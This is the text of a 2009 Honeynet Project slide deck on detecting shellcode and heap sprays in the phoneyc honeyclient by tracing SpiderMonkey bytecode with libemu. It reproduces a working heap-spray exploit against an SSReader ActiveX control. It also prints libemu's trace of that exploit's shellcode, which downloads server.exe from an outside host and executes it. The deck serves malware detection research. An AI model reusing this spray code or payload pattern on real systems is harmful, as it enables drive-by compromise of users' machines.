shellcode and heapspray detection in phoneyc

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN . . . . . .

.

.

. ..

.

.

Shellcode and heapspray detection in phoneyc

Zhijie Chen1

1Honeynet Project Chinese Chapter

Honeynet Project on Google Summer of Code, 2009

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 2

Contents

.. .1 Introduction to phoneyc

.. .2 A Typical Web-Based Malware

.. .3 Shellcode detection using Libemu

.. .4 Tracing Mozilla Spidermonkey

Basic Principles of Spidermonkey

.. .5 Shellcode Detection in phoneyc

Basic IdeaDetailsRelated Source filesImplementation

.. .6 Heapspray Detection

.. .7 Current Results

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 3

Contents










phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 4

Introduction to phoneyc

http://code.google.com/p/phoneyc/

A python honeyclient

Original written by Jose Nazario.

To detect Web-based Malware

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 5

Contents










phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 6

A Typical Heapspray Mal-javascript I

1 <body><script>window.onerror=function(){return true;}</script><object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"

style=’display:none’ id=’target’></object><SCRIPT language="javascript">

6 var shellcode = unescape("%u9090"+"%u9090"+...(shellcode)"%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672

%u7265%u652e%u6578%u0000");</script><SCRIPT language="javascript">

11 var bigblock = unescape("%u9090%u9090");var headersize = 20;var slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);

16 block = bigblock.substring(0, bigblock.length−slackspace);while(block.length+slackspace<0x40000)block = block+block+fillblock;

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 7

A Typical Heapspray Mal-javascript II

memory = new Array();for (x=0; x<100; x++) memory[x] = block +shellcode;

21 var buffer = ’’;while (buffer.length < 1024) buffer+="\x05";var ok="1111";target.Register(ok,buffer);</script>

26 </body>

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 8

Heap Status After Heapspray

| More than ??MB 0x90(NOP)s or some other x86 instructionsas a sledge | Shellcode |

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 9

Detecting Shellcode/Heapspray

SC/HS Detecting Tool: How To Detect It?

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 10

Contents










phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 11

Introduction to libemu

.From it’s official site:..

.

. ..

.

.

libemu is a small library written in c offering basic x86emulation and shellcode detection using GetPC heuristics.Using libemu one can:

detect shellcodes

execute the shellcodes

profile shellcode behaviour

Using libemu to detect shellcode and heapspray in web-basedmalware: ¡¡Defending browsers against drive-by downloads:Mitigating heap-spraying code injection attacks¿¿)

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 12

Detecting x86 Instructions

SC/HS Detecting Time: When To Detect It?

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 13

Contents










phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 14

Introduction to spidermonkey

.What is SpiderMonkey?..

.

. ..

.

.

SpiderMonkey is the code-name for the Mozilla’s Cimplementation ofJavaScript.(http://www.mozilla.org/js/spidermonkey/)

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 15


All the javascript sources are compiled into js bytecodes.

There is an interpreter who interprets the bytecodes anddo certain simple actions.

All the javascript variables are stored as jsval.

Some of the values are store as an “atom”, such as strings.

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 16

Contents










phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 17

Basic Idea

As both the shellcode manipulation and the spraying of thefillblock involve assignments. The shellcode will be detectedimmediately on it’s assignment if we are able to interruptspidermonkey at the interpretion of certain bytecodes related toan assignment and check its argments and values for shellcodes.

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 18

Details I

The following js codes:

function a(){b="c"; var a = 0;}

are compiled into bytecodes like:

00000: bindname "b"

00003: string "c"

00006: setname "b"

4 00009: pop00010: zero00011: setvar 000014: pop00015: stop

So, if we examine the set* opcodes’ arguments on the top ofthe stack in runtime, shellcodes won’t get passed!

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 19

Details

To do so, we need to:

Step trace the spidermonkey runtime.

Stop at the key bytecodes (such as setname, setvar,setprop, setarg etc.) on all kinds ofassignments.Unfortunately different assignments havedifferent bytecode accordingly.

But all the opcodes related to assignments share aJOF SET bit in their opcode descriptionstructure(./src/jsopcode.h).

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 20

Related Source files to be used later

jsapi.h:Basic APIs for javascript execution.

jsdbgapi.h:Basic APIs for debugging spidermonkey.

jsopcode.tbl:All the js opcodes(bytecodes).

jsinterp.c:You can find how each bytecode is interpretedhere.

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 21

Implementation

Register a trace handler into spidermonkey usingJS SetInterrupt. This handler will be called at each stepof the bytecode execution.

In the handler:

Use JS GetTrapOpcode to get currentopcode(bytecode).Use JS FrameIterator to get current runtime stack.Check the rvalue of the set* bytecodes on the top of thestack with libemu.Dump the shellcodes and alert.Contine the execution.

Privide this traced js virtual as a python module namedhoneyjs, so other part of phoneyc can use this module justthe same as python-spidermonkey with optional awarenessof the extra shellcode/heapspray detection APIs.

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 22

Contents










phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 23

Basic Idea

.Heapspray..

.

. ..

.

.

A myriad of NOP-like x86 instructions

Accumulating through a loop of assignments

Shellcode in the end of each sledge

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 24

Basic Idea

.Heapspray..

.

. ..

.

.

A myriad of NOP-like x86 instructions

Accumulating through a loop of assignments

Shellcode in the end of each sledge

.Detection..

.

. ..

.

.

Now: A variable counter to record the mal-assignments(assignments containing shellcode in the r-value).

In the future: entropy ? the nozzle way?

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 25

Contents










phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 26

A Run on ssreader 0day.html I

joyan@Jdeb:˜/code/phoneyc$ sh go.sh2 HONEYCLIENT MODULE TEST

fetching http://172.31.25.227/phoneyc/ssreader 0day.html[]==> http://172.31.25.227/phoneyc/ssreader 0day.htmlJS EVAL

7 Executing Javascript:DEBUG: !!!SC DETECTED at 141847268=141847572size:374DEBUG: !!!SC DETECTED at 141847524=141847756size:32728DEBUG: !!!SC DETECTED at 141723488=141847756size:32728DEBUG: !!!SC DETECTED at 141723488=141847756size:32728

12...

DEBUG: !!!SC DETECTED at 141723488=141847756size:32728SSReader Pdg2 Register method overflow

17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1Runing shellcode... offset:248DEBUG: Begin analyzing ...DEBUG: download http://1v1.name/server.exe −>

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 27

A Run on ssreader 0day.html II

c:\WINDOWS\system32\a.exe22

...

URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server.exe’]

Done27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1

[ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT:100

VBS EVAL IFRAMES []HREFS []FRAMES []

32 IMAGES []

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 28

Analysis of The Shellcode using libemu I

FARPROC WINAPI GetProcAddress (HMODULE hModule = 0x7c800000 =>

3 none;LPCSTR lpProcName = 0x0041710c =>

= "GetSystemDirectoryA";) = 0x7c814eea;FARPROC WINAPI GetProcAddress (

8 HMODULE hModule = 0x7c800000 =>none;

LPCSTR lpProcName = 0x00417120 =>= "WinExec";

) = 0x7c86136d;13 FARPROC WINAPI GetProcAddress (

HMODULE hModule = 0x7c800000 =>none;

LPCSTR lpProcName = 0x00417128 =>= "ExitThread";

18 ) = 0x7c80c058;FARPROC WINAPI GetProcAddress (

HMODULE hModule = 0x7c800000 =>

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 29

Analysis of The Shellcode using libemu II

none;LPCSTR lpProcName = 0x00417133 =>

23 = "LoadLibraryA";) = 0x7c801d77;HMODULE LoadLibraryA (

LPCTSTR lpFileName = 0x00417140 =>= "urlmon";

28 ) = 0x7df20000;FARPROC WINAPI GetProcAddress (

HMODULE hModule = 0x7df20000 =>none;

LPCSTR lpProcName = 0x00417147 =>33 = "URLDownloadToFileA";

) = 0x7df7b0bb;UINT GetSystemDirectory (

LPTSTR lpBuffer = 0x0012fe5f =>none;

38 UINT uSize = 32;) = 19;HRESULT URLDownloadToFile (

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 30

Analysis of The Shellcode using libemu III

LPUNKNOWN pCaller = 0x00000000 =>none;

43 LPCTSTR szURL = 0x0041715a =>= "http://1v1.name/server.exe";

LPCTSTR szFileName = 0x0012fe5f =>= "c:\WINDOWS\system32\a.exe";

DWORD dwReserved = 0;48 LPBINDSTATUSCALLBACK lpfnCB = 0;

) = 0;UINT WINAPI WinExec (

LPCSTR lpCmdLine = 0x0012fe58 =>= "cmd /c c:\WINDOWS\system32\a.exe";

53 UINT uCmdShow = 0;) = 32;

phoneyc withlibemu

Z. Chen

phoneyc

WB Malware

Libemu

Tracing JS

Basic Principles

SCDetection

Basic Idea

Details

Source Files

Implementation

HS Detection

CurrentResults

JoYAN 31

.

Thank you!.. .. ..

.

.

shellcode and heapspray detection in phoneyc

Technology